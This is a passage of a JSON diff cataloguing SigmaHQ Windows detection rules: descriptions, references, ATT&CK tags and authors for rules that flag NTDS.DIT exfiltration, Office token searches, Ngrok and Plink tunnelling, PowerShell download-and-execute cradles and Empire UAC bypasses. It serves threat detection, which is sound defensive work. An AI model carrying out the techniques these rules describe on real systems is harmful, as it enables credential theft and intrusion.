[ + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_net_execution.yml", + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "level": "low", + "falsepositive": [ + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", + "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "value": "Suspicious Net Use Command Combo", + "meta": { + "refs": [ + "https://twitter.com/ShadowChasing1/status/1552595370961944576", + "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_net_use.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a when net.exe is called with a password in the command line", + "uuid": "d4498716-1d52-438f-8084-4a603157d131", + "value": "Password Provided In Command Line Of Net.exe", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/09", + "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", + "author": "Tim Shelton (HAWK.IO)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "value": "New Kernel Driver Via SC.EXE", + "meta": { + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/14", + "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Rare legitimate installation of kernel drivers via sc.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "value": "Suspicious New Service Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/14", + "filename": "proc_creation_win_susp_new_service_creation.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "value": "Ngrok Usage", + "meta": { + "refs": [ + "https://ngrok.com/docs", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", + "https://twitter.com/xorJosh/status/1598646907802451969", + "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2021/05/14", + "filename": "proc_creation_win_susp_ngrok_pua.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "value": "Suspicious Nmap Execution", + "meta": { + "refs": [ + "https://nmap.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2021/12/10", + "filename": "proc_creation_win_susp_nmap.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Network administrator computer" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "value": "Execution of Suspicious File Type Extension", + "meta": { + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/12/09", + "filename": "proc_creation_win_susp_non_exe_image.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", + "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "value": "Suspicious Ntdll Pipe Redirection", + "meta": { + "refs": [ + "https://www.x86matthew.com/view_post?id=ntdll_pipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/03/05", + "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "value": "Suspicious Process Patterns NTDS.DIT Exfil", + "meta": { + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/zcgonvh/NTDSDumpEx", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/11", + "filename": "proc_creation_win_susp_ntds.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", + "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/09/14", + "filename": "proc_creation_win_susp_ntdsutil_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage to restore snapshots", + "Legitimate admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", + "value": "Suspicious NTLM Authentication on the Printer Spooler Service", + "meta": { + "refs": [ + "https://twitter.com/med0x2e/status/1520402518685200384", + "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2022/05/04", + "filename": "proc_creation_win_susp_ntlmrelay.yml", + "author": "Elastic (idea), Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "value": "Suspicious NT Resource Kit Auditpol Usage", + "meta": { + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2021/12/18", + "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", + "author": "Nasreddine Bencherchali @nas_bench", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://twitter.com/Hexacorn/status/1187143326673330176", + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ], + "creation_date": "2019/10/25", + "filename": "proc_creation_win_susp_odbcconf.yml", + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", + "value": "Suspicious Office Token Search Via CLI", + "meta": { + "refs": [ + "https://mrd0x.com/stealing-tokens-from-office-applications/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": "2022/10/25", + "filename": "proc_creation_win_susp_office_token_search.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate command-lines containing the string mentioned in the command-line" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The OpenWith.exe executes other binary", + "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "value": "OpenWith.exe Executes Specified Binary", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/10/12", + "filename": "proc_creation_win_susp_openwith.yml", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "level": "high", + "falsepositive": [ + "Legitimate use of OpenWith.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", + "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", + "value": "Suspicious Execution from Outlook", + "meta": { + "refs": [ + "https://github.com/sensepost/ruler", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1202" + ], + "creation_date": "2018/12/27", + "filename": "proc_creation_win_susp_outlook.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious program execution in Outlook temp folder", + "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "value": "Execution in Outlook Temp Folder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2019/10/01", + "filename": "proc_creation_win_susp_outlook_temp.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "value": "Suspicious Process Parents", + "meta": { + "refs": [ + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/21", + "filename": "proc_creation_win_susp_parents.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "value": "Conhost Spawned By Suspicious Parent Process", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/09/28", + "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "value": "PCHunter Usage", + "meta": { + "refs": [ + "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/10", + "filename": "proc_creation_win_susp_pchunter.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "value": "Code Execution via Pcwutl.dll", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + "https://twitter.com/harr0ey/status/989617817849876488", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_susp_pcwutl.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Use of Program Compatibility Troubleshooter Helper" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "value": "Execute Code with Pester.bat", + "meta": { + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_susp_pester.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", + "value": "Execute Code with Pester.bat as Parent", + "meta": { + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_susp_pester_parent.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "value": "Suspicious Ping And Del Combination", + "meta": { + "refs": [ + "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/11/03", + "filename": "proc_creation_win_susp_ping_del.yml", + "author": "Ilya Krestinichev", + "level": "high", + "falsepositive": [ + "False positive could occur in admin scripts that execute inline" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a ping command that uses a hex encoded IP address", + "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "value": "Ping Hex IP", + "meta": { + "refs": [ + "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" + ], + "creation_date": "2018/03/23", + "filename": "proc_creation_win_susp_ping_hex_ip.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "uuid": "48a61b29-389f-4032-b317-b30de6b95314", + "value": "Suspicious Plink Port Forwarding", + "meta": { + "refs": [ + "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2021/01/19", + "filename": "proc_creation_win_susp_plink_port_forward.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execution of plink to perform data exfiltration and tunneling", + "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "value": "Suspicious Plink Usage RDP Tunneling", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2022/08/04", + "filename": "proc_creation_win_susp_plink_usage.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "meta": { + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/11/18", + "filename": "proc_creation_win_susp_powercfg.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "value": "Suspicious PowerShell Encoded Command Patterns", + "meta": { + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/05/24", + "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other tools that work with encoded scripts in the command line instead of script files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to download files or content using PowerShell", + "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", + "value": "PowerShell Web Download", + "meta": { + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/24", + "filename": "proc_creation_win_susp_powershell_download_cradles.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Scripts or tools that download files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to download files or content and execute them using PowerShell", + "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "value": "PowerShell Web Download and Execution", + "meta": { + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/03/24", + "filename": "proc_creation_win_susp_powershell_download_iex.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Scripts or tools that download files and execute them" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell command line parameters used in Empire", + "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", + "value": "Empire PowerShell Launch Parameters", + "meta": { + "refs": [ + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/04/20", + "filename": "proc_creation_win_susp_powershell_empire_launch.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other tools that incidentally use the same command line parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects some Empire PowerShell UAC bypass methods", + "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", + "value": "Empire PowerShell UAC Bypass", + "meta": { + "refs": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2019/08/30", + "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", + "author": "Ecco", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Commandline to launch powershell with a base64 payload", + "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", + "value": "Suspicious Execution of Powershell with Base64", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/01/02", + "filename": "proc_creation_win_susp_powershell_encode.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + 